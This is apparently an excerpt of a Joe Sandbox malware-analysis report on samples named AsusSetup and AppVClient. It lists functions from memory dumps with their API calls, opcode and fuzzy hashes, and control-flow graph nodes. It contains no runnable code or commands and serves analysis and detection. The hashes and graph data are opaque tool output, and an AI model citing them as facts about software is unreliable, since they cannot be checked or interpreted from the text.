                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b63effb34f7ad229d2f8481b85073b53b936557c6f19cf734c30284eb0ff6338
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 72569329deec86259d58cd490f09f991ec866a8fe049b31c5768425421b791e0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b63effb34f7ad229d2f8481b85073b53b936557c6f19cf734c30284eb0ff6338
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DE08C7000C7068FD796CB88D08CB3A7BE2FBC8348F048418A58AC2250CB38818DDB42
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068B76 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b5d510f54f190b41ef9304eccb758e96c77d313a1906c0b31328302ad949a01
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bf815d57bbc27ced79192fcadf98123bc883c8738c83b8fcf3f9d1a0ef5c1555
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5d510f54f190b41ef9304eccb758e96c77d313a1906c0b31328302ad949a01
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86D0A93422870E8ACBAE8F20292C23A20C3A3D806032ACB2A006BE1084CE32444AB021
                                                                                                                                                                                                                                                                                                                                                                                          Function 0206615A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f38b3d7fc64b22a56f2c86c710218589a1fe9382d05e0b8a998e624ad2d28af1
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cbdd4307c5fff1fd121098f255aa6a56ff50b1c2779d364d5df5d65b44ee0ce0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f38b3d7fc64b22a56f2c86c710218589a1fe9382d05e0b8a998e624ad2d28af1
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EED0C921A587064AF7AA4A3A683D33766DEA74022AF0897398063841D0DF7FC102A681
                                                                                                                                                                                                                                                                                                                                                                                          Function 020692DD Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 83dbcb6670d8f604cd81e2834c63a396093eb5b0311d9ad889ae66546caaff62
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 37a7d8f16f9e343fd0967bfcf8b8c8eb2e7e4088ebadf2452a9506872e12146d
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83dbcb6670d8f604cd81e2834c63a396093eb5b0311d9ad889ae66546caaff62
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27D0C93001870D8BDB928A50888DB7E76E9B744208F048508948B95A50C7388209E522
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068FAA Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 723acebcdce85ba2f10dda4430793235e2ab0109130791c18cab4d7bdce07846
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: eedd97079f8555b5a956e5cf2f6901befc38b717f69b19c610e05cccb488080a
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 723acebcdce85ba2f10dda4430793235e2ab0109130791c18cab4d7bdce07846
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74C08C3000471B86CAAB4B40726C33E30E29748188318821E9403600058B32808CA622
                                                                                                                                                                                                                                                                                                                                                                                          Function 02065D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e50ff4b398edbe320d17c4448c00199e6ae9f1531a426a4d25c5b2c38acc862
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4B01200028F8649C0771B300C4C23C0DC02E4A038DF51F6CCFB3178E2DA301404B720
                                                                                                                                                                                                                                                                                                                                                                                          Function 02065990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cea66dc277b04826148e6cb7e1fddd06734cd6c9e953aa591cce5a709932b4f9
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c7be2cbd0bb995e6d2620ec06bfa8de7aa73bc50543db2bcf883a00b5570e889
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cea66dc277b04826148e6cb7e1fddd06734cd6c9e953aa591cce5a709932b4f9
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0821753152DB844FD7AB97184CDC3BA2EE2BB85328FCC019BD0C6C7291DA2A450DF652
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6aa3e1c552310bcbb758a386667589a11fe7fd818f871c106a95b3db2f64f042
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EF0C83451DB538FCAA78718A06C57E6BE0BF81214B5D80CAD447CBD52CB14DD0AF752
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f3e8028455085fd025027e7bfc4fe53a22a415661106f44d2c239a0d29ad07c4
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F0902440D7438FCAF78A14E48C63A27E07F51254B6CC089C447CB962C724DD4DFB52
                                                                                                                                                                                                                                                                                                                                                                                          Function 020683E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 14edfb4d0090b10af77b607882ffd62934590cac436d85568a81f0c3c3664c97
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F06D64508B438FC6F78A14A48CA3E27E0AF41248B6CD089C447CA962C724DC4EF752

                                                                                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                          Function 02092ED0 Relevance: 1.8, APIs: 1, Instructions: 321COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _clrfp
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3618594692-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e986fb20cc6a4b96f13b77a4c75e56c1fa9b5f40b783a2be06cde8f52965c1d5
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2B14630610B4D8FDF9ACF1CC88AB6677E0FB49308B198599E85ACB261C335E852DF41

                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:5.3%
                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:59
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 3946 5381e3 3950 5381e5 3946->3950 3947 538357 GetTokenInformation 3947->3950 3948 53830b CloseHandle 3948->3950 3949 538212 GetTokenInformation 3949->3950 3951 538220 3949->3951 3950->3947 3950->3948 3950->3949 3950->3951 3935 535d22 3936 535cd4 CreateThread CloseHandle 3935->3936 3939 535bbc 3935->3939 3936->3939 3937 535c2c 3938 535d56 CreateThread 3938->3939 3939->3936 3939->3937 3939->3938 3940 535d50 CreateThread 3939->3940 3940->3939 3923 538201 3925 5381e5 3923->3925 3927 538220 3923->3927 3924 53830b CloseHandle 3924->3925 3925->3924 3926 538357 GetTokenInformation 3925->3926 3925->3927 3928 538212 GetTokenInformation 3925->3928 3926->3925 3928->3925 3928->3927 3866 535d50 CreateThread 3870 535bbc 3866->3870 3867 535cd4 CreateThread CloseHandle 3867->3870 3868 535c2c 3869 535d56 CreateThread 3869->3870 3870->3866 3870->3867 3870->3868 3870->3869 3871 5383e7 3874 5381e5 3871->3874 3872 53830b CloseHandle 3872->3874 3873 538212 GetTokenInformation 3873->3874 3876 538220 3873->3876 3874->3872 3874->3873 3875 538357 GetTokenInformation 3874->3875 3874->3876 3875->3874 3877 535b8f 3890 5453f0 3877->3890 3879 535baf 3895 5381c0 3879->3895 3881 535c2c 3882 535c85 3901 535990 3882->3901 3884 535dcd 3884->3884 3885 535c20 3885->3881 3885->3882 3889 535bbc 3885->3889 3886 535d50 CreateThread 3886->3889 3887 535d56 CreateThread 3887->3889 3888 535cd4 CreateThread CloseHandle 3888->3889 3889->3881 3889->3886 3889->3887 3889->3888 3891 5453f4 3890->3891 3892 54545e VirtualAlloc 3891->3892 3894 5453f6 3891->3894 3893 545460 3892->3893 3893->3891 3894->3879 3899 5381e5 3895->3899 3896 53830b CloseHandle 3896->3899 3897 538220 3897->3885 3898 538357 GetTokenInformation 3898->3899 3899->3896 3899->3897 3899->3898 3900 538212 GetTokenInformation 3899->3900 3900->3897 3900->3899 3904 535994 wcscpy 3901->3904 3902 535a23 3902->3884 3903 535a8d VirtualAlloc 3903->3904 3904->3902 3904->3903 3941 5358de 3942 5453f0 VirtualAlloc 3941->3942 3943 5358f9 3942->3943 3944 5381c0 3 API calls 3943->3944 3945 535907 3944->3945

                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                          Function 005381C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 0 5381c0-5381d8 1 5383bf-5383ca 0->1 3 5383d0 1->3 4 538277-53827a 1->4 3->4 5 5383d6 3->5 6 538241 4->6 7 53827c 4->7 8 5383d7-5383dd 5->8 9 538251-538256 call 5672f4 6->9 10 538376-53837b 6->10 7->6 11 53827e 7->11 21 53825b-538260 9->21 12 538381 10->12 13 5382f0-53831c 10->13 15 538284 11->15 16 53830b-538311 CloseHandle 11->16 12->13 19 538387 12->19 33 538322 13->33 34 5381e5 13->34 17 53832e-538330 15->17 16->17 22 538332 17->22 23 5382dd-5382e3 17->23 19->4 24 538390-538393 19->24 21->24 22->23 25 538334 22->25 27 5383a3-5383a4 23->27 28 5382e9 23->28 24->11 26 538399 24->26 30 53f524-53f52e 25->30 26->11 31 53839f-5383a1 26->31 28->27 32 5382ef 28->32 37 53f807 30->37 31->27 32->13 33->34 38 538328-53832c 33->38 35 5382a3-5382a5 34->35 36 5381eb 34->36 39 5382ab 35->39 40 5383f9 35->40 41 5382b2-5382bc 36->41 42 5381f1 36->42 43 53f8df-53f8e0 37->43 44 53f80d 37->44 38->17 45 5382c5-5382c8 38->45 39->40 46 5382b1 39->46 49 5382d2-5382d7 40->49 50 5383ff 40->50 41->45 48 538357-53836f GetTokenInformation 41->48 42->41 47 5381f7 42->47 56 5415a5-5415aa 43->56 44->43 52 53f813 44->52 45->40 51 5382ce 45->51 46->41 53 53828e 47->53 48->10 57 538306-538309 49->57 50->30 54 5382d0 51->54 55 53828f-538303 call 5672ec 51->55 59 53f81b 52->59 60 53f78f 52->60 53->55 54->49 54->55 55->57 70 53834f-538355 55->70 62 5415ae-5415af 56->62 57->16 57->17 59->43 60->59 63 53f795 60->63 65 5415b2-5415b7 62->65 63->37 66 5415ba-5415c1 65->66 68 5415c7-5415d2 66->68 69 541750-5417a2 call 5672f4 66->69 72 5415d4-5415d6 68->72 73 541620-541623 68->73 80 538212-53821a GetTokenInformation 70->80 81 538341 70->81 76 541670-541684 72->76 77 5415dc-5415df 72->77 78 541625-541628 73->78 79 5416a0-5416b4 73->79 76->56 89 54168a-54168d 76->89 77->66 85 5415e1-5415f6 77->85 78->66 88 54162a-541636 78->88 83 5416f4-5416f5 79->83 84 5416b6-5416b9 79->84 86 538220-538234 80->86 87 5383af 80->87 81->80 82 538347 81->82 90 541638-541640 82->90 91 53834d 82->91 103 5416fe-54170c 83->103 92 54173a-54173b 84->92 93 5416bb 84->93 94 5416d2-5416d7 85->94 95 5415fc-541600 85->95 86->8 113 53823a 86->113 87->9 98 5383b5 87->98 88->90 97 5416dc-5416ec 88->97 99 541693-541697 89->99 100 54172f-541738 89->100 105 541646-54165f 90->105 106 54170e-541727 90->106 91->70 108 54173f-541740 92->108 101 5416bf-5416cd 93->101 94->62 102 541606-541618 95->102 95->103 97->68 104 5416f2 97->104 98->9 107 5383bb-5383bd 98->107 99->101 100->108 102->65 110 541744-541748 103->110 104->69 105->68 112 541665 105->112 106->68 111 54172d 106->111 107->1 108->110 111->69 112->69 113->8 114 538240 113->114 115 54b32e-54b330 114->115 116 54b300 115->116 117 54b332-54b337 call 5672f4 115->117 121 54b302 116->121 122 54b2fd 116->122 117->116 123 54b339 117->123 124 54b305 122->124 125 54b2ff 122->125 123->116 126 54b33b-54b33f 123->126 127 54b322-54b32d 124->127 128 54b308-54b315 124->128 125->128 126->128 127->115 128->124 130 54b317 128->130 130->122
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 18e3a729b769248b414e84ec4bce77d67cda131ab1aa6094c82213f172c0e01f
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0B1043450CF458BDB2DCB1D88802B6BFA1FF95318F288A59F49B87666DE24DC42C352
                                                                                                                                                                                                                                                                                                                                                                                          Function 00535B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 131 535b8f-535c20 call 5453f0 call 568358 call 550320 call 5381c0 141 535c26 131->141 142 535cf4-535d08 call 5672ec 131->142 141->142 144 535c2c-535c2f 141->144 146 535c87-535dc8 call 535e60 call 535990 142->146 147 535d0e 142->147 162 535dcd 146->162 147->146 148 535d14-535d18 147->148 152 535c65 148->152 153 535daf-535db6 call 5352d0 148->153 155 535ca3 call 535df0 152->155 156 535c67 152->156 165 535c30-535c39 153->165 166 535dbc 153->166 171 535c45-535d6d call 551520 155->171 156->155 159 535c69-535c72 156->159 163 535c97-535c9d 159->163 164 535c78 159->164 162->162 183 535c85 163->183 184 535c9f 163->184 172 535d1f-535d45 164->172 173 535c7e 164->173 180 535bf7 165->180 181 535cb9-535cbd 165->181 168 535dbe 166->168 169 535d7d-535d89 166->169 168->169 188 535d9b 168->188 185 535d94 169->185 186 535d8b-535d92 169->186 189 535bfd-535c06 171->189 201 535d73 171->201 194 535d47 172->194 195 535cd4-535cea CreateThread CloseHandle 172->195 173->172 179 535c84-535d5b CreateThread 173->179 179->164 180->181 180->189 192 535cc3 181->192 193 535d56-535d5b CreateThread 181->193 183->146 184->183 196 535ca1 184->196 185->144 199 535cb3 185->199 186->185 197 535d9c 186->197 188->197 205 535da5-535da8 189->205 192->193 200 535cc9 192->200 193->164 194->195 195->186 202 535cf0-535d4d 195->202 196->155 197->205 199->144 199->181 200->193 201->189 206 535d79-535d7b 201->206 202->185 205->153 206->169
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b7f9120428929f6c550565d25b3330efab7238328c553d73d723701cfea0c46e
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F41E720618F0D8FDB699B38945D3797FE0FB95318F583DA6E407CB1A2FA248E058752
                                                                                                                                                                                                                                                                                                                                                                                          Function 00535D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 208 535d22-535d45 209 535d47 208->209 210 535cd4-535cea CreateThread CloseHandle 208->210 209->210 211 535cf0-535d4d 210->211 212 535d8b-535d92 210->212 215 535d94 211->215 212->215 216 535d9c 212->216 219 535cb3 215->219 220 535c2c-535c2f 215->220 218 535da5-535db6 call 5352d0 216->218 231 535c30-535c39 218->231 232 535dbc 218->232 219->220 221 535cb9-535cbd 219->221 223 535cc3 221->223 224 535d56-535d5b CreateThread 221->224 223->224 227 535cc9 223->227 225 535c78 224->225 229 535d1f-535d45 225->229 230 535c7e 225->230 227->224 229->209 229->210 230->229 233 535c84-535d5b CreateThread 230->233 231->221 242 535bf7 231->242 235 535dbe 232->235 236 535d7d-535d89 232->236 233->225 235->236 243 535d9b 235->243 236->212 236->215 242->221 244 535bfd-535c06 242->244 243->216 244->218
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1714083515.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_530000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
